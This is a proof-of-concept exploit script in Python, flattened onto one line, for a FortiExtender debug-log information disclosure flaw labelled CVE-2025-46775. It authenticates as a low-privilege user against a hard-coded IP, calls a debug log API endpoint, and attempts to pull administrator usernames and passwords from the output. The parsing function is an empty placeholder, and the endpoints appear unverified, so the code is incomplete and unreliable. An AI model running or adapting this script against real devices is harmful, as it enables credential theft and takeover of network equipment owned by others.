CVE-2025-46775 FortiExtender调试日志信息泄露漏洞

#!/usr/bin/env python3 # CVE-2025-46775 PoC - FortiExtender Debug Log Information Disclosure # This PoC demonstrates how an authenticated low-privilege user can obtain admin credentials import requests import json import sys # Configuration TARGET_IP = "192.168.1.99" # Target FortiExtender IP USERNAME = "low_privilege_user" # Low privilege user account PASSWORD = "user_password" def exploit_cve_2025_46775(): """ Exploit CVE-2025-46775: Information disclosure via debug log commands """ print(f"[*] Targeting FortiExtender: {TARGET_IP}") print(f"[*] Authenticating as: {USERNAME}") # Step 1: Authentication auth_url = f"https://{TARGET_IP}/api/v2/login" auth_data = { "username": USERNAME, "password": PASSWORD } session = requests.Session() try: response = session.post(auth_url, json=auth_data, verify=False, timeout=10) if response.status_code != 200: print("[-] Authentication failed") return False print("[+] Authentication successful") except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") return False # Step 2: Execute debug log command to trigger information disclosure print("[*] Executing debug log command...") debug_url = f"https://{TARGET_IP}/api/v2/cmdb/system/debug" debug_params = { "action": "log", "level": "debug" } try: response = session.get(debug_url, params=debug_params, verify=False, timeout=10) if response.status_code == 200: print("[+] Debug log retrieved") # Check for admin credentials in response if "admin" in response.text.lower() or "password" in response.text.lower(): print("[!] Admin credentials potentially exposed!") print("[*] Extracting sensitive information...") # Parse and display exposed credentials exposed_data = parse_exposed_credentials(response.text) if exposed_data: print("[+] Exposed credentials found:") for cred in exposed_data: print(f" - Username: {cred.get('username')}") print(f" - Password: {cred.get('password')}") return True else: print("[-] No credentials found in debug log") return False else: print(f"[-] Debug command failed: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Request error: {e}") return False def parse_exposed_credentials(data): """ Parse exposed credentials from debug log output """ # This is a placeholder - actual implementation depends on response format exposed = [] # Parse logic would extract username/password from debug output return exposed if __name__ == "__main__": print("CVE-2025-46775 PoC - FortiExtender Debug Log Information Disclosure") print("=" * 70) success = exploit_cve_2025_46775() if success: print("\n[+] Exploitation successful - Admin credentials obtained") else: print("\n[-] Exploitation failed") sys.exit(0 if success else 1)